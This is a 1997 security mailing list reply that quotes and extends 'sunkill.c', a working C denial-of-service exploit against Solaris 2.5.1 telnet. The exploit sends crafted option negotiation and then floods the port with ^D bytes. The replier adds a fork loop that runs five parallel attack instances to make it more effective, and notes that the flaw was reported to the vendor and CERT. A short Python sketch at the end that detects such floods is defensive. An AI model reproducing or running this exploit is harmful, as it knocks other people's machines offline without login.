X-RDate: Tue, 23 Dec 1997 12:40:46 +0500 (ESK)
Date: Sun, 14 Dec 1997 14:27:27 -0600
From: Craig Johnston <caj@PRALINE.NO.NEOSOFT.COM>
To: best-of-security@cyber.com.au
Subject: BoS:      Re: To kill a sun:


On Sat, 13 Dec 1997, Jason Zapman II wrote:

> This is sunkill.c
>
> It affects at least Solaris 2.5.1 machines, both sun4c and sun4m
> architectures.  I imagine it affects all Solaris 2.5.1 machines, both sparc
> and x86, but I'm not sure.  It basically works by opening a telnet
> connection on the victim machine and sends a few bad telnet negotiation
> options, then floods the port with lots of ^D characters.  This uses all
> the streams memory (I think) on the victim's machine and causes the kernel
> to get very angry.  The machine crawls to a halt, the cursor in X stops
> moving, the machine is unresponsive to the network.  It's a bad situation
> all around.

BTW, Sun is aware of this, but has neglected to do anything about it.
CERT has been made aware as well.  Both quite some time ago.  I guess
a no-login-needed, denial of service attack on any open telnet port
isn't very meaningful.

The telnet options are pretty standard, actually.

This code has killed all the way up to ultras running 2.5.1.

I've added a line that seems to make this do a lot better -- it
just runs 5 instances in parallel.  I've also tidied up a couple of
little things, they are the now-unquoted lines.

The affected machine will ping but good luck getting a login
prompt or doing anything much else on it.

Some machines seem to shrug it off, while on others it is
devastating.  With persistence, it seems to take out most of 'em sooner
or later.

The machine doesn't actually crash, it goes into deep hibernation.  Leave
it alone and it'll come back.

>
> /*
>     **  To make, if your system is BSD'ish:  gcc <thisfile>
>     **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
>     **
>     **  Usage: a.out <victim's hostname>
>     **
>     **  Have fun!
>     */
>
>     #include <signal.h>
>     #include <sys/types.h>
>     #include <sys/socket.h>
>     #include <netinet/in.h>
>     #include <netdb.h>
>     #include <arpa/telnet.h>
>     #include <string.h>
>     #include <unistd.h>
>
>     #define BUFSIZE 100
>     #define DOTS
>
>     void catchit(void)
>     {
>         printf("\nCaught SIGPIPE -- your link may be too slow.\n");
>         exit(1);
>     }
>
>     int main(int argc, char *argv[])
>     {
>         unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
>         TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
>         TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
>
>         unsigned char nastybuf[BUFSIZE];
>         struct sockaddr_in sin;
>         struct servent *sp;
>         struct hostent *hp;
>         int s;
>
          int child;
          for(child=4;child && fork();--child);  /* and then there were 5 */

>         typedef void (*sig_t) (int);
>         signal(SIGPIPE,(sig_t)catchit);
>
>         memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */
>
          if ((s = socket(AF_INET, SOCK_STREAM, 0))==-1) {
            perror("socket");
>           exit(1);
>           }
>
>         if (!(hp = gethostbyname(argv[1]))) {
            herror("gethostbyname");
>           exit(1);
>           }
>
>         bzero(&sin,sizeof(sin));
>         bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
>         sin.sin_family = AF_INET;
>         sp = getservbyname("telnet","tcp");
>         sin.sin_port = sp->s_port;
>
>         if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
              perror("connect");
>             exit(1);
>         }
>
>         printf("connected to %s\n",argv[1]);
>         write(s,kludge_telopt,21);   /* kludge some telnet negotiation */
>
>         /*  "Let them eat ^Ds..." */
>
>         while (write(s,nastybuf,BUFSIZE) != -1) {
>
>     #ifdef DOTS
>             write(STDOUT_FILENO,".",1);
>     #endif
>         }
>     }
>

--
Craig A. Johnston  /  Applications Engineer, NeoSoft, Inc.
caj@neosoft.com    /  ph: (504) 539-9235
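
A detection-side sketch of the traffic described in this thread, added here as an example and not part of either post: it separates telnet option negotiation from data in a captured client-to-server stream and flags streams whose data is almost entirely ^D. The function names, the sample streams and the thresholds (1024 bytes, 90%) are assumptions.

```python
IAC, SB, SE = 255, 250, 240                    # telnet command bytes (RFC 854)
NEGOTIATE = (251, 252, 253, 254)               # WILL, WONT, DO, DONT
EOT = 0x04                                     # ^D

def split_telnet(stream: bytes):
    """Split a client-to-server byte stream into option commands and user data."""
    options, data, i, n = [], bytearray(), 0, len(stream)
    while i < n:
        b = stream[i]
        if b != IAC:
            data.append(b)
            i += 1
        elif i + 1 >= n:
            break                              # capture ends mid-command
        elif stream[i + 1] == IAC:
            data.append(IAC)                   # IAC IAC is an escaped 0xFF data byte
            i += 2
        elif stream[i + 1] in NEGOTIATE:
            if i + 2 >= n:
                break
            options.append((stream[i + 1], stream[i + 2]))
            i += 3
        elif stream[i + 1] == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)   # simplified: first IAC SE
            if end == -1:
                break
            i = end + 2
        else:
            i += 2                             # other two-byte commands (NOP, AYT, ...)
    return options, bytes(data)

def looks_like_eot_flood(stream: bytes, min_bytes: int = 1024, ratio: float = 0.9) -> bool:
    """True when the data part is large and almost entirely ^D (assumed thresholds)."""
    _, data = split_telnet(stream)
    return len(data) >= max(min_bytes, 1) and data.count(EOT) / len(data) >= ratio

# Constructed samples: the 21 negotiation bytes match the option sequence quoted above.
NEGOTIATION = bytes([255, 252, 24, 255, 253, 3, 255, 252, 35, 255, 252, 31,
                     255, 252, 36, 255, 252, 39, 255, 253, 1])
NORMAL = NEGOTIATION + b"alice\r\nls -l\r\n" + bytes([EOT])     # one ^D to log out
FLOOD = NEGOTIATION + bytes([EOT]) * 4096                       # data is only ^D

if __name__ == "__main__":
    for name, sample in (("normal", NORMAL), ("flood", FLOOD)):
        print(name, looks_like_eot_flood(sample))
```

Because the flood arrives before any login, the same check can be applied to the pre-authentication part of a session only.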
